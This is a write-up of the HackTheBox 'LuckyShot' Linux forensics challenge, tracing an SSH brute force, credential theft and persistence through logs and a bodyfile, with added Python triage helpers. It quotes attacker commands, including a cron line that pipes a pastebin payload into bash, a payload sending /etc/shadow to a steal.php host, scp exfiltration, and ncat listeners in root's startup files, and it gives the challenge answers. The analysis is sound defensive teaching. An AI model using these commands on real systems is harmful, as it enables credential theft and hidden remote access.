LuckyShot - Easy DFIR Linux HackTheBox Writeup

LuckyShot

Scenario

The IT Manager of Techniqua-Solutions Corp. is responsible for managing the company’s infrastructure. As part of his daily work, he frequently accesses company servers and workstations. One morning, the IT Manager discovered that several critical company files were missing, while others had been modified or replaced with unfamiliar ones. Concerned about a potential breach, he reported the issue to the security team.

As an incident response analyst, your task is to investigate the case. You have been provided with a forensic image of the IT Manager’s machine.

We are provided with LuckyShot.zip, which contains:

tree -L 2 LuckyShot
# LuckyShot
# ├── bodyfile
# │   └── bodyfile.txt
# ├── hash_executables
# │   ├── hash_executables.md5
# │   └── hash_executables.sha1
# ├── live_response
# │   ├── hardware
# │   ├── network
# │   ├── packages
# │   ├── process
# │   ├── storage
# │   └── system
# └── [root]
#     ├── etc
#     ├── home
#     ├── lib
#     ├── root
#     ├── run
#     ├── snap
#     ├── tmp
#     ├── usr
#     └── var

Let's break down what we see:

  • The body file contains an entry for every file on the system, including its timestamps, which is what we need for timeline analysis.
  • hash_executables contains MD5 and SHA1 hashes for every executable file on the system.
  • live_response holds the live-collection output for the various components (hardware, network, packages, processes, storage, system).
  • [root] is the filesystem image itself.

Before looking at the users on the system, note what live_response/system/env.txt tells us about how the evidence was collected:

SUDO_COMMAND=./uac -p ir_triage /home/administrator/Desktop/

The collected data was produced by the Unix-like Artifacts Collector (UAC).

Tasks

Task 1

Looking at [root]/home, we find two home directories, administrator and Regev (the latter contains nothing useful).

administrator is a good place to start; let's check whether /home/administrator/.bash_history or similar exists:

# ...
sudo apt install git -y
cd /tmp/
git clone https://github.com/alessandroz/lazagne.git
cd lazagne/linux
ls
sudo apt install python3-pip -y
pip3 install --user -r ../requirements.txt --break-system-packages
sudo apt install libsqlite3-dev -y
python3 laZagne.py all
sudo apt install curl -y
curl -o /tmp/mimipenguin.sh https://raw.githubusercontent.com/huntergregal/mimipenguin/master/mimipenguin.sh
chmod +x /tmp/mimipenguin.sh
which strings
cd /Documents
ls -la
scp Passwords_Backup.txt Server_Credentials.txt kali@192.168.161.198:~/Desktop/
cd /tmp/
chmod +x sys_monitor.sh
sudo ./sys_monitor.sh
cd ~/Documents
firefox
sudo systemctl status ssh
lsblk
fdisk -l
htop
ps aux
exit

Interesting. The files were subsequently deleted by the attacker; we don't see them in bodyfile.txt. Let's look at hash_executables for any outliers:

45c5554367d3a460e8609d28e926e1d7  /home/administrator/Desktop/Telegram/Updater
21c2afdf2725a226a06a0d7e220fddbd  /home/administrator/tmp/sys_monitor.sh

Let's look for these on the system:

mactime -b bodyfile.txt -h -y | grep -E "Updater|sys_monitor"
# 2025-01-27T20:39:49Z 10615032 m... -rwxr-xr-x 1000     1000     1835174  /home/administrator/Downloads/tsetup.5.10 (2).7/Telegram/Updater
#                      10615032 m... -rwxr-xr-x 1000     1000     1838104  /home/administrator/Desktop/Telegram/Updater
#                      10615032 .a.b -rwxr-xr-x 1000     1000     1838104  /home/administrator/Desktop/Telegram/Updater
#                      10615032 ..c. -rwxr-xr-x 1000     1000     1838104  /home/administrator/Desktop/Telegram/Updater
# 2025-02-09T19:07:32Z 10615032 .a.b -rwxr-xr-x 1000     1000     1835174  /home/administrator/Downloads/tsetup.5.10 (2).7/Telegram/Updater
# 2025-02-09T19:07:33Z 10615032 ..c. -rwxr-xr-x 1000     1000     1835174  /home/administrator/Downloads/tsetup.5.10 (2).7/Telegram/Updater

Looking at [root]/home/administrator again we see a .ssh directory, so let's check the Linux auth.log for any suspicious activity:

2025-02-10T19:40:08.242696+02:00 LuckyShot sshd[13349]: Failed password for invalid user Administrator from 192[.]168[.]161[.]198 port 60512 ssh2
2025-02-10T19:40:08.283076+02:00 LuckyShot sshd[13351]: Failed password for invalid user Administrator from 192[.]168[.]161[.]198 port 60526 ssh2
2025-02-10T19:40:08.287937+02:00 LuckyShot sshd[13352]: Failed password for invalid user Administrator from 192[.]168[.]161[.]198 port 60532 ssh2
2025-02-10T19:40:08.307888+02:00 LuckyShot sshd[13355]: Failed password for invalid user Administrator from 192[.]168[.]161[.]198 port 60544 ssh2
2025-02-10T19:40:08.319122+02:00 LuckyShot sshd[13349]: Connection closed by invalid user Administrator 192[.]168[.]161[.]198 port 60512 [preauth]
2025-02-10T19:40:08.335000+02:00 LuckyShot sshd[13357]: Failed password for invalid user Administrator from 192[.]168[.]161[.]198 port 60552 ssh2
2025-02-10T19:40:08.359732+02:00 LuckyShot sshd[13351]: Connection closed by invalid user Administrator 192[.]168[.]161[.]198 port 60526 [preauth]
2025-02-10T19:40:08.364293+02:00 LuckyShot sshd[13352]: Connection closed by invalid user Administrator 192[.]168[.]161[.]198 port 60532 [preauth]
2025-02-10T19:40:08.383775+02:00 LuckyShot sshd[13355]: Connection closed by invalid user Administrator 192[.]168[.]161[.]198 port 60544 [preauth]
2025-02-10T19:40:08.412157+02:00 LuckyShot sshd[13357]: Connection closed by invalid user Administrator 192[.]168[.]161[.]198 port 60552 [preauth]
2025-02-10T19:40:08.512086+02:00 LuckyShot sshd[13359]: Failed password for invalid user Administrator from 192[.]168[.]161[.]198 port 60562 ssh2
2025-02-10T19:40:08.541970+02:00 LuckyShot sshd[13343]: Failed password for invalid user Administrator from 192[.]168[.]161[.]198 port 60482 ssh2
2025-02-10T19:40:08.550658+02:00 LuckyShot sshd[13345]: Failed password for invalid user Administrator from 192[.]168[.]161[.]198 port 60490 ssh2
2025-02-10T19:40:08.563604+02:00 LuckyShot sshd[13347]: Failed password for invalid user Administrator from 192[.]168[.]161[.]198 port 60500 ssh2
2025-02-10T19:40:08.588631+02:00 LuckyShot sshd[13359]: Connection closed by invalid user Administrator 192[.]168[.]161[.]198 port 60562 [preauth]
2025-02-10T19:40:09.222237+02:00 LuckyShot sshd[13361]: Failed password for invalid user Administrator from 192[.]168[.]161[.]198 port 60566 ssh2
2025-02-10T19:40:09.284529+02:00 LuckyShot sshd[13363]: Failed password for invalid user Administrator from 192[.]168[.]161[.]198 port 60580 ssh2
2025-02-10T19:40:09.495200+02:00 LuckyShot sshd[13361]: Connection closed by invalid user Administrator 192[.]168[.]161[.]198 port 60566 [preauth]
2025-02-10T19:40:09.560134+02:00 LuckyShot sshd[13363]: Connection closed by invalid user Administrator 192[.]168[.]161[.]198 port 60580 [preauth]
2025-02-10T19:40:09.581480+02:00 LuckyShot sshd[13343]: Connection closed by invalid user Administrator 192[.]168[.]161[.]198 port 60482 [preauth]
2025-02-10T19:40:09.591420+02:00 LuckyShot sshd[13345]: Connection closed by invalid user Administrator 192[.]168[.]161[.]198 port 60490 [preauth]
2025-02-10T19:40:09.606439+02:00 LuckyShot sshd[13347]: Connection closed by invalid user Administrator 192[.]168[.]161[.]198 port 60500 [preauth]

The attacker tried a number of usernames:

cat auth.log | grep "Failed password for invalid user" | cut -d' ' -f9 | sort | uniq -c | sort -n
#      75 ubuntu
#      76 default
#      79 admin
#      87 Administrator
cat auth.log | grep "Failed password for root" | cut -d' ' -f7 | sort | uniq -c | sort -n
#      75 root

What method did the attacker use to gain access to the system?

brute force

Task 2

Let's find the very first brute-force attempt:

cat auth.log | grep "Failed password for" | head -n 3
# 2025-02-10T19:38:20.457698+02:00 LuckyShot sshd[12985]: Failed password for root from 192[.]168[.]161[.]198 port 45784 ssh2
# 2025-02-10T19:38:20.463242+02:00 LuckyShot sshd[12993]: Failed password for root from 192[.]168[.]161[.]198 port 45820 ssh2
# 2025-02-10T19:38:20.467250+02:00 LuckyShot sshd[12984]: Failed password for root from 192[.]168[.]161[.]198 port 45782 ssh2

Now let's locate the first "Accepted password for" entry after February 10th, 2025 at 19:38:20:

cat auth.log | grep "Accepted password for" | head -n 3
# 2025-02-10T19:39:03.232692+02:00 LuckyShot sshd[13105]: Accepted password for administrator from 192[.]168[.]161[.]198 port 46160 ssh2
# 2025-02-10T19:41:10.248386+02:00 LuckyShot sshd[13613]: Accepted password for administrator from 192[.]168[.]161[.]198 port 42878 ssh2
# 2025-02-10T20:08:12.256311+02:00 LuckyShot sshd[16413]: Accepted password for administrator from 192[.]168[.]161[.]198 port 56302 ssh2

At what time did the attacker successfully log in for the first time?

2025-02-10 19:39:03
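The grep, cut and uniq pipelines above can be turned into one small parser that does both jobs: tally failed logins per source and username, then find the first accepted login from the same source after the spray began. This is an added example, not part of the original writeup; the log lines embedded in it are constructed to mirror the excerpts above, not copied from the evidence.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed sample lines modelled on the auth.log excerpts quoted above (not the real file).
SAMPLE_AUTH_LOG = """\
2025-02-10T19:38:20.457698+02:00 LuckyShot sshd[12985]: Failed password for root from 192.168.161.198 port 45784 ssh2
2025-02-10T19:38:20.463242+02:00 LuckyShot sshd[12993]: Failed password for root from 192.168.161.198 port 45820 ssh2
2025-02-10T19:38:21.100000+02:00 LuckyShot sshd[13001]: Failed password for invalid user admin from 192.168.161.198 port 45900 ssh2
2025-02-10T19:38:21.200000+02:00 LuckyShot sshd[13002]: Failed password for invalid user Administrator from 192.168.161.198 port 45910 ssh2
2025-02-10T19:38:21.300000+02:00 LuckyShot sshd[13003]: Failed password for administrator from 192.168.161.198 port 45920 ssh2
2025-02-10T19:39:03.232692+02:00 LuckyShot sshd[13105]: Accepted password for administrator from 192.168.161.198 port 46160 ssh2
2025-02-10T19:41:10.248386+02:00 LuckyShot sshd[13613]: Accepted password for administrator from 192.168.161.198 port 42878 ssh2
"""

# One pattern covers both forms: "Failed password for invalid user X" and "Failed password for X".
LINE_RE = re.compile(
    r"^(?P<ts>\S+) \S+ sshd\[\d+\]: (?P<result>Accepted|Failed) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse(log_text):
    """Yield (timestamp, result, user, source ip) for every sshd password event."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.fromisoformat(m["ts"]), m["result"], m["user"], m["ip"]

def failed_attempts(log_text):
    """Failed logins per (source ip, username), the same tally as the cut | sort | uniq -c pipelines."""
    return Counter((ip, user) for _, result, user, ip in parse(log_text) if result == "Failed")

def first_success_after_failures(log_text, ip):
    """For one source ip, return (first failure, first accepted login, user) or None.

    A successful login that follows a burst of failures from the same source is the
    'brute force, then access' pattern behind Tasks 1 to 3."""
    events = [e for e in parse(log_text) if e[3] == ip]
    failures = [e for e in events if e[1] == "Failed"]
    if not failures:
        return None
    first_failure = failures[0][0]
    for ts, result, user, _ in events:
        if result == "Accepted" and ts >= first_failure:
            return first_failure, ts, user
    return None
```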

Task 3

Which user account was compromised by the attacker?

administrator

Task 4

This one is a bit odd: the command appears earlier in the bash history than the timeline would suggest. There may be a discrepancy related to the UTC+2 timezone.

What command was executed by the attacker to check user privileges?

groups administrator

Task 5

We already saw this in the bash history.

What was the first tool the attacker downloaded to extract stored credentials from the system?

LaZagne

Task 6

The attacker located sensitive files on the compromised system and transferred them to a remote machine. Which command-line tool was used for this exfiltration?

scp

Task 7

What IP did the attacker exfiltrate the files to?

192.168.161.198

Task 8

The attacker continued their exploitation and executed a malicious script on the victim machine. What is the name of the script?

sys_monitor.sh

Task 9

What is the SHA1 hash of the malware?

3ae5dea716a4f7bfb18046bfba0553ea01021c75

Task 10

Let's look for signs of persistence, starting with any newly created services. We can check the bodyfile for this; if we apply our theory of the UTC+2 discrepancy (the bodyfile timestamps are in UTC, two hours behind the auth.log) we get results:

mactime -b bodyfile.txt -h -y -d 2025-02-10T17:39:03..2025-02-10T20:00:00 | grep ".service\"$" | grep -v ' -> '
# ...
# 2025-02-10T18:11:19Z,180,...b,-rw-r--r--,0,0,7605073,"/etc/systemd/system/systemd-networkm.service"
# 2025-02-10T18:22:04Z,180,mac.,-rw-r--r--,0,0,7605073,"/etc/systemd/system/systemd-networkm.service"
cat etc/systemd/system/systemd-networkm.service
# [Unit]
# Description=System Network Management
# After=network.target
# 
# [Service]
# ExecStart=/bin/bash /tmp/sys_monitor.sh
# Restart=always
# User=root
# 
# [Install]
# WantedBy=multi-user.target

The malware installed a component that pretends to be part of system network management but is actually running with root privileges. What is the name of the component?

systemd-networkm.service

Task 11

Looking at the files under /root/ we find persistence there as well; the attacker appended:

tail -n 1 .bashrc .profile
# ==> .bashrc <==
# ncat -lvp 7575 &
# 
# ==> .profile <==
# ncat -lvp 9000 &

The attacker modified several startup configuration files, each spawning a network listener on a different port at login. What is the name of the file that starts the listener on the lowest port number?

.bashrc

Task 12

While we're in /root/, there is also a .ssh/ directory; let's check its contents:

cat .ssh/authorized_keys
# ssh-rsa <TRIM> kali@kali

What is the username and hostname associated with the attacker?

kali@kali

Task 13

The attacker created a user for persistence. What is the name of the created user?

Regev

Task 14

We could look at auth.log, but the bodyfile works too: user creation is quick, so the timestamp on the /home/Regev directory should match:

mactime -b bodyfile.txt -h -y -d | grep "/home/Regev"
# ...
# 2025-02-11T07:33:36Z,4096,.a..,drwxr-x---,1001,1001,1839307,"/home/Regev"

We can then add 2 hours to compensate.

At what exact timestamp was the new user created on the system?

2025-02-10T19:40:08Z
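The mactime filters used in Tasks 10 and 14 (and the Updater lookup earlier) can be reproduced without The Sleuth Kit by parsing the bodyfile directly. This added example is not code from the writeup or from UAC: it expands each body row into MACB events the way mactime does, applies the host's +02:00 offset so the UTC bodyfile times line up with auth.log, and filters by path pattern and time window. The three body rows are constructed from the entries quoted above, with the epoch values computed from those timestamps.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed bodyfile rows (TSK body format: MD5|name|inode|mode|UID|GID|size|atime|mtime|ctime|crtime,
# epoch seconds in UTC), modelled on the unit file and Updater entries quoted above.
SAMPLE_BODYFILE = """\
0|/etc/systemd/system/systemd-networkm.service|7605073|-rw-r--r--|0|0|180|1739211724|1739211724|1739211724|1739211079
0|/etc/systemd/system/multi-user.target.wants/systemd-networkm.service -> /etc/systemd/system/systemd-networkm.service|7605074|lrwxrwxrwx|0|0|52|1739211724|1739211724|1739211724|1739211724
0|/home/administrator/Desktop/Telegram/Updater|10615032|-rwxr-xr-x|1000|1000|1838104|1738010389|1738010389|1738010389|1738010389
"""

HOST_TZ = timezone(timedelta(hours=2))  # the +02:00 offset auth.log is written in

def parse_bodyfile(text):
    """Expand every row into (utc datetime, MACB flags, mode, uid, gid, size, path), one per distinct time."""
    events = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        _, name, _inode, mode, uid, gid, size, a, m, c, b = line.split("|")
        by_time = {}
        for flag, ts in zip("macb", (m, a, c, b)):  # mactime prints the flags in m, a, c, b order
            by_time.setdefault(int(ts), []).append(flag)
        for ts, flags in sorted(by_time.items()):
            macb = "".join(f if f in flags else "." for f in "macb")
            events.append((datetime.fromtimestamp(ts, timezone.utc), macb, mode, int(uid), int(gid), int(size), name))
    return sorted(events, key=lambda e: e[0])

def timeline(text, pattern, start_host, end_host, skip_symlinks=True):
    """Equivalent of `mactime -d ... | grep pattern | grep -v ' -> '`, with the window given in host local
    time and every timestamp printed in host local time so it can be compared with auth.log directly."""
    start = datetime.fromisoformat(start_host).replace(tzinfo=HOST_TZ)
    end = datetime.fromisoformat(end_host).replace(tzinfo=HOST_TZ)
    rx = re.compile(pattern)
    rows = []
    for ts, macb, mode, uid, gid, size, name in parse_bodyfile(text):
        if skip_symlinks and " -> " in name:
            continue
        if start <= ts <= end and rx.search(name):
            rows.append((ts.astimezone(HOST_TZ).strftime("%Y-%m-%dT%H:%M:%S%z"), macb, mode, uid, gid, size, name))
    return rows
```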

Task 15

Looking at etc/cron.d/syscheck we find more persistence:

*/1 * * * * root command -v curl >/dev/null 2>&1 || (apt update && apt install -y curl) && curl -fsSL https://pastebin.com/raw/SAuEez0S | rev | base64 -d | bash

The malware set up an automated process to fetch and execute a remote payload from a legitimate web service. What is the full command responsible for retrieving this payload?

command -v curl >/dev/null 2>&1 || (apt update && apt install -y curl) && curl -fsSL https://pastebin.com/raw/SAuEez0S | rev | base64 -d | bash

Task 16

If we decode the payload we get:

curl -fsSL https://pastebin.com/raw/SAuEez0S | rev | base64 -d
# base64 /etc/shadow | curl -X POST -d @- hXXp[://]192[.]168[.]161[.]198/steal.php
# base64 /etc/passwd | curl -X POST -d @- hXXp[://]192[.]168[.]161[.]198/steal.php

The payload was used to extract more sensitive files. What was the command run to extract the more sensitive file?

base64 /etc/shadow | curl -X POST -d @- http://192[.]168[.]161[.]198/steal.php (Without the fang)
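As an added example (not code from the writeup), here is a small triage helper for the three persistence artifacts found in Tasks 10, 11 and 15: it flags cron entries that fetch a remote resource and pipe it into a shell, systemd units whose ExecStart runs a script from a scratch directory as root, listener lines appended to shell rc files, and it undoes the rev | base64 -d staging so a retrieved payload can be read offline. All inputs are constructed from the artifacts quoted above; the staged blob is built locally from the decoded payload rather than fetched.

```python
import base64
import re

# Constructed artifacts modelled on the cron entry, unit file and rc files quoted above.
CRON_LINE = ("*/1 * * * * root command -v curl >/dev/null 2>&1 || (apt update && apt install -y curl) "
             "&& curl -fsSL https://pastebin.com/raw/SAuEez0S | rev | base64 -d | bash")
UNIT_FILE = ("[Unit]\nDescription=System Network Management\nAfter=network.target\n\n"
             "[Service]\nExecStart=/bin/bash /tmp/sys_monitor.sh\nRestart=always\nUser=root\n")
RC_FILES = {".bashrc": "export PATH=$PATH:~/bin\nncat -lvp 7575 &\n",
            ".profile": "umask 022\nncat -lvp 9000 &\n"}
PAYLOAD = "base64 /etc/shadow | curl -X POST -d @- hXXp[://]192[.]168[.]161[.]198/steal.php\n"
STAGED = base64.b64encode(PAYLOAD.encode()).decode()[::-1]  # what the hosted stage looks like, built locally

def decode_reversed_base64(stage):
    """Undo the `rev | base64 -d` pipeline: reverse the text, then base64-decode it."""
    return base64.b64decode(stage.strip()[::-1]).decode()

CRON_INDICATORS = {
    "pipe_to_shell": re.compile(r"\|\s*(?:ba)?sh\b"),
    "remote_fetch": re.compile(r"\b(?:curl|wget)\b"),
    "obfuscation": re.compile(r"\brev\b|base64\s+(?:-d|--decode)\b"),
}

def scan_cron_line(line):
    """Names of the indicators present in one cron.d line (empty list for a benign entry)."""
    return sorted(name for name, rx in CRON_INDICATORS.items() if rx.search(line))

def scan_systemd_unit(unit_text):
    """Flag a unit whose ExecStart runs from a scratch directory; a missing User= means root."""
    fields = dict(re.findall(r"^(ExecStart|User)=(.*)$", unit_text, re.M))
    exec_start = fields.get("ExecStart", "")
    scratch = re.search(r"(?:^|\s)(?:/tmp|/var/tmp|/dev/shm)/", exec_start) is not None
    return {"exec_start": exec_start, "user": fields.get("User", "root"), "runs_from_scratch_dir": scratch}

LISTENER_RE = re.compile(r"\b(?:ncat|netcat|nc)\b[^\n#]*?-l\S*\s*(?:-p\s*)?(\d+)")

def find_listeners(rc_files):
    """(port, filename) for every nc/ncat listener found in the rc files, lowest port first."""
    found = []
    for fname, text in rc_files.items():
        for m in LISTENER_RE.finditer(text):
            found.append((int(m.group(1)), fname))
    return sorted(found)
```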